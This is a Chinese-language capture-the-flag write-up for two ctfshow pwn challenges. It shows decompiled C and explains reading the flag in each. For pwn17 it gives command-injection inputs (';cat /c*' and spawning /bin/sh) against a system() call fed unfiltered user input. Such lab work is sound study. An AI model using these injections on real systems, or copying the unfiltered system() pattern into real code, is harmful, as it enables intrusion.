毛坯的人生和精装的朋友圈
pwn17
/* pwn17 main command loop (decompiler output).  The enclosing function and the
 * declarations of v4, buf and dest are outside this listing. */
while ( 1 )
{
menu();
v4 = 0;
puts("\nEnter the command you want choose:(1.2.3.4 or 5)\n");
/* Return value of scanf is ignored: on non-numeric input v4 stays 0 and the
 * default branch runs (the bad token is presumably left in stdin, so the loop
 * would keep re-reading it). */
__isoc99_scanf("%d", &v4);
switch ( v4 )
{
case 1:
system("id");
break;
case 2:
/* VULN: at most 0xA = 10 raw bytes of user input go into buf (read() does not
 * NUL-terminate; strcat assumes buf is already zero-filled, which this listing
 * cannot confirm), get appended to whatever command prefix dest holds and are
 * run through the shell.  Nothing filters ';', '|', '`' or similar, so this is
 * straightforward command injection. */
puts("Which directory?('/','./' or the directiry you want?)");
read(0, buf, 0xAuLL);
strcat(dest, buf);
system(dest);
puts("Execution succeeded!");
break;
case 3:
/* The "intended" path to the flag: 1+1+2+3+5+20 s of theatre, then
 * sleep(0x1BF52) = 114514 s (~31.8 h) before the flag is cat'ed.
 * Not a practical route. */
sleep(1u);
puts("$cat /ctfshow_flag");
sleep(1u);
puts("ctfshow{");
sleep(2u);
puts("... ...");
sleep(3u);
puts("Your flag is ...");
sleep(5u);
puts("ctfshow{flag is not here!}");
sleep(0x14u);
puts("wtf?You haven't left yet?\nOk~ give you flag:\nflag is loading......");
sleep(0x1BF52u);
system("cat /ctfshow_flag");
break;
case 4:
/* Only prints a canned su failure message; no authentication is attempted. */
sleep(2u);
puts("su: Authentication failure");
break;
case 5:
puts("See you!");
exit(-1);
default:
puts("command not found!");
break;
}
}
当我们看到case3中的system("cat /ctfshow_flag");觉得稳了
但是前面的 sleep(0x1BF52u) 要先等 0x1BF52 = 114514 秒（约 31.8 小时，再加上前面几次 sleep 共 32 秒）才会执行到 system("cat /ctfshow_flag")，显然不现实
所以我们看到了case2
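case 2:
    puts("Which directory?('/','./' or the directiry you want?)");
    /* read() stores at most 0xA = 10 raw bytes (not 9) into buf and does not
     * NUL-terminate it; strcat below therefore relies on buf having been
     * zero-filled beforehand (buf's declaration is not in this listing). */
    read(0, buf, 0xAuLL);
    /* The attacker-controlled bytes are appended to the existing command
     * string in dest and the whole thing is run through the shell: classic
     * command injection, with no filtering of ';', '|', '`' and friends. */
    strcat(dest, buf);
    system(dest);
    puts("Execution succeeded!");
    break;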
根本原因是 case 2 把用户输入原样拼接到 dest 后直接交给 system() 执行，没有任何过滤。按作者的思路，输入 /bin/sh 后拼接得到 //bin/sh，POSIX 下连续的斜杠等价于一个，因此 system() 实际启动的就是 /bin/sh，我们拿到一个 shell（这一步取决于 dest 原有的内容，反编译片段里没有给出）。read() 读入的末尾换行符会被 shell 当作命令结束，不影响执行。
也可以利用 shell 元字符注入：输入 `;cat c*`（7 字节，在 read 的 10 字节上限之内）会在 dest 原命令之后再执行 cat c*；不过 c* 只有在当前目录恰好是 / 时才能匹配到 /ctfshow_flag，更稳妥的写法是 `;cat /c*`（8 字节），用绝对路径就不依赖工作目录了。
pwn18
main
puts("Which is the real flag?");
__isoc99_scanf("%d", &v4);
if ( v4 == 9 )
fake();
else
real();
system("cat /ctfshow_flag");
return 0;
}
fake()
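/* pwn18: the "fake" branch — in fact the one we want.
 * '>>' appends to /ctfshow_flag, so the original flag survives and is
 * printed by the system("cat /ctfshow_flag") that main() runs afterwards.
 * Returns the status reported by system(). */
int fake()
{
    return system("echo 'flag is here'>>/ctfshow_flag");
}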
real()
/* pwn18: the "real" branch — despite its name, this is the trap.
 * A single '>' truncates /ctfshow_flag before writing, so the flag that
 * main() cats afterwards is already gone.  Returns the status reported
 * by system(). */
int real()
{
return system("echo 'flag is here'>/ctfshow_flag");
}
>>的意思是在/ctfshow_flag后追加flag is here
>是直接覆盖掉/ctfshow_flag的内容了
所以只需输入 9 走 fake() 分支：flag 被追加而不是覆盖，随后 main() 里的 system("cat /ctfshow_flag") 就会把原来的 flag 连同追加的那一行一起打出来；输入其他任何值都会进入 real() 把 flag 覆盖掉。